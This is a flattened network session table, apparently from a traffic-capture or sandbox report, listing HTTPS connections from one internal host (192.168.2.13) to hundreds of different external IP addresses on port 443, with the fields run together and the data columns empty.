                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12347192.168.2.134014290.101.190.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12348192.168.2.134976432.90.153.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12349192.168.2.1357872143.250.69.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12350192.168.2.1339694117.165.238.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12351192.168.2.134877487.143.182.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12352192.168.2.1360992130.83.198.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12353192.168.2.135191417.108.157.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12354192.168.2.1356152218.213.230.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12355192.168.2.1335956139.246.199.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12356192.168.2.133320268.154.40.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12357192.168.2.136028819.206.174.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12358192.168.2.133405012.227.123.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12359192.168.2.1348542189.157.73.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12360192.168.2.1345628107.197.195.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12361192.168.2.134277444.116.154.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12362192.168.2.1356046210.235.92.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12363192.168.2.135211046.193.45.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12364192.168.2.1360788147.147.83.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12365192.168.2.1342238160.40.202.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12366192.168.2.1352136165.169.72.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12367192.168.2.135255098.39.110.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12368192.168.2.135478257.147.235.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12369192.168.2.135584449.105.189.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12370192.168.2.1353602195.85.205.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12371192.168.2.133488480.62.177.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12372192.168.2.1337822167.11.240.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12373192.168.2.134506684.252.235.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12374192.168.2.1349368149.244.27.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12375192.168.2.134044279.168.216.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12376192.168.2.133595464.254.185.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12377192.168.2.1336688190.23.57.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12378192.168.2.1360616202.180.39.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12379192.168.2.134743643.239.35.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12380192.168.2.1346040199.214.217.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12381192.168.2.133589261.9.182.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12382192.168.2.134756276.19.240.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12383192.168.2.1353614120.210.195.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12384192.168.2.1359324165.77.196.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12385192.168.2.1355834136.31.104.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12386192.168.2.133477472.27.36.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12387192.168.2.1340130182.224.110.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12388192.168.2.1348410136.1.185.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12389192.168.2.1334576142.229.102.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12390192.168.2.135427832.1.226.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12391192.168.2.1335204217.4.132.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12392192.168.2.1347008125.201.64.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12393192.168.2.1350302220.36.70.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12394192.168.2.133927436.140.212.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12395192.168.2.1345068177.181.167.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12396192.168.2.1336608151.69.141.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12397192.168.2.1345676209.46.144.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12398192.168.2.1345392192.212.144.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12399192.168.2.135918465.137.28.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12400192.168.2.1344946112.224.37.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12401192.168.2.1356214220.77.189.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12402192.168.2.135001625.163.4.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12403192.168.2.1355316189.245.240.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12404192.168.2.1339016126.29.43.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12405192.168.2.135024020.221.27.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12406192.168.2.1335182181.248.68.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12407192.168.2.1358234168.52.88.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12408192.168.2.1358154108.114.143.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12409192.168.2.1360764111.117.139.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12410192.168.2.1339198106.71.168.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12411192.168.2.134386657.212.51.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12412192.168.2.133375495.8.38.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12413192.168.2.133913650.59.52.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12414192.168.2.1360848204.30.253.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12415192.168.2.135044095.4.226.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12416192.168.2.135354079.248.207.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12417192.168.2.135333853.212.45.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12418192.168.2.1332978101.223.119.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12419192.168.2.1360004207.77.71.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12420192.168.2.1338412141.115.189.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12421192.168.2.133797041.34.208.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12422192.168.2.1343386185.113.162.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12423192.168.2.1356128170.198.105.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12424192.168.2.1344288208.167.91.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12425192.168.2.133277654.226.69.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12426192.168.2.1353840205.202.90.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12427192.168.2.1346786207.169.119.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12428192.168.2.1360478151.149.125.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12429192.168.2.1339626163.204.40.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12430192.168.2.1334466200.216.165.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12431192.168.2.133964475.148.169.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12432192.168.2.1360182170.99.215.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12433192.168.2.1346432107.88.185.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12434192.168.2.1346296220.35.246.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12435192.168.2.134429296.69.239.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12436192.168.2.1338724116.41.8.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12437192.168.2.134802060.209.180.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12438192.168.2.1335116101.93.162.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12439192.168.2.1337880155.186.125.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12440192.168.2.1360706148.24.107.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12441192.168.2.1345466105.100.232.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12442192.168.2.135191235.143.214.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12443192.168.2.1343220114.36.204.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12444192.168.2.1358472124.43.223.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12445192.168.2.1338078124.2.92.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12446192.168.2.1333320167.34.213.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12447192.168.2.1336486195.3.223.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12448192.168.2.134579885.77.227.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12449192.168.2.134129619.90.255.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12450192.168.2.1340230164.246.41.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12451192.168.2.134897037.137.199.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12452192.168.2.13383762.27.94.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12453192.168.2.1349056145.210.202.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12454192.168.2.134534076.99.92.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12455192.168.2.135302475.87.32.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12456192.168.2.1338240188.248.125.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12457192.168.2.1354148180.134.147.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12458192.168.2.1349274223.36.51.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12459192.168.2.134645667.107.142.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12460192.168.2.1349920134.84.173.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12461192.168.2.1355530133.201.53.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12462192.168.2.1337086209.68.147.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12463192.168.2.1334134190.141.225.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12464192.168.2.1353516191.62.199.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12465192.168.2.1345104183.25.187.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12466192.168.2.1348344218.93.199.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12467192.168.2.1336742121.4.183.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12468192.168.2.1355338216.221.232.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12469192.168.2.1335242180.230.115.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12470192.168.2.1334944177.165.168.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12471192.168.2.1357702198.162.138.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12472192.168.2.1342038108.189.160.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12473192.168.2.1340468169.51.146.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12474192.168.2.1354364208.102.186.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12475192.168.2.1360152200.3.87.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12476192.168.2.1337032128.48.69.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12477192.168.2.1352982135.6.214.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12478192.168.2.1345390133.134.43.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12479192.168.2.13583249.81.25.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12480192.168.2.1344036167.202.132.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12481192.168.2.133323224.12.82.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12482192.168.2.13376462.240.75.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12483192.168.2.1338148137.137.137.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12484192.168.2.135231227.96.174.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12485192.168.2.1358532176.113.60.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12486192.168.2.133747647.185.220.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12487192.168.2.1350494128.143.64.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12488192.168.2.135416841.110.195.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12489192.168.2.134155412.92.103.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12490192.168.2.134724880.216.107.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12491192.168.2.1352170173.216.48.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12492192.168.2.134306691.61.123.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12493192.168.2.1350764121.14.22.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12494192.168.2.1342616168.225.202.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12495192.168.2.1333960108.154.4.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12496192.168.2.1340576118.93.168.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12497192.168.2.135202286.80.213.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12498192.168.2.13437701.97.168.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12499192.168.2.135326425.51.140.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12500192.168.2.1355022153.235.166.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12501192.168.2.1344250108.131.109.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12502192.168.2.1350870154.215.127.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12503192.168.2.1343342193.82.5.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12504192.168.2.1338320145.101.23.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12505192.168.2.1344398168.248.188.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12506192.168.2.1349892133.161.249.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12507192.168.2.1336198102.50.165.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12508192.168.2.135249280.8.193.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12509192.168.2.1358872120.248.181.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12510192.168.2.1356842102.179.147.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12511192.168.2.135159896.39.75.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12512192.168.2.1351392117.72.167.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12513192.168.2.133748299.205.120.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12514192.168.2.133513831.209.220.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12515192.168.2.1344226210.66.11.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12516192.168.2.134140272.34.36.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12517192.168.2.134726070.145.188.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12518192.168.2.1338324115.75.49.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12519192.168.2.134962698.185.42.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12520192.168.2.1359390213.98.60.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12521192.168.2.1358096125.211.27.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12522192.168.2.1350042121.151.5.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12523192.168.2.1341996143.80.221.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12524192.168.2.1345556218.64.64.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12525192.168.2.1352660119.40.25.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12526192.168.2.135463239.211.196.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12527192.168.2.1348464194.125.7.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12528192.168.2.1336182218.89.66.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12529192.168.2.135915098.59.39.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12530192.168.2.1351832161.61.201.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12531192.168.2.1337268155.124.207.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12532192.168.2.135466617.9.234.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12533192.168.2.1351110146.183.13.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12534192.168.2.134095877.73.189.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12535192.168.2.1354908185.221.23.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12536192.168.2.1341118117.89.177.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12537192.168.2.1357176192.211.57.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12538192.168.2.1342490115.191.49.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12539192.168.2.135867017.141.29.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12540192.168.2.1340542122.30.90.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12541192.168.2.1337284103.72.241.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12542192.168.2.135672862.38.204.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12543192.168.2.1336432184.39.145.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12544192.168.2.1348232208.221.214.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12545192.168.2.1357462158.184.29.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12546192.168.2.1343244118.233.76.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12547192.168.2.134805475.180.104.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12548192.168.2.1348252194.93.95.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12549192.168.2.1355996177.129.126.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12550192.168.2.1358124178.114.130.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12551192.168.2.135038477.140.64.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12552192.168.2.1337008119.116.215.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12553192.168.2.1339438189.245.185.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12554192.168.2.133922685.197.238.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12555192.168.2.136096093.135.191.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12556192.168.2.1360932145.60.216.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12557192.168.2.134480050.102.53.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12558192.168.2.1333938202.53.217.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12559192.168.2.134438074.194.44.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12560192.168.2.134228891.48.197.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12561192.168.2.13381462.33.168.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12562192.168.2.1339924142.213.176.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12563192.168.2.1341810113.53.42.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12564192.168.2.1347212141.251.155.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12565192.168.2.13502108.33.156.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12566192.168.2.1332998123.43.23.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12567192.168.2.135612890.255.154.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
